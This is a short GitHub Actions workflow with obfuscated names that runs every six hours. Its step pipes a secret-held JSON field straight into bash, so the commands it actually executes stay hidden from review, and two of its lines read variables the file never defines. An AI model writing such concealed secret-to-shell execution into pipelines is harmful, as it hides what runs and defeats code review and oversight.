name: yzhuoxingchen

on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yzhuoxingchen
        env:
          rgpgu91: ${{ secrets.rgpgu91 }}
        run: |
          echo $rgpgu91 | jq -r .qca7 | /bin/bash
          echo $pciem76939 | jq -r .wur47 | /bin/bash
          echo $pen12 | jq -r .hcs77573 | /bin/bash

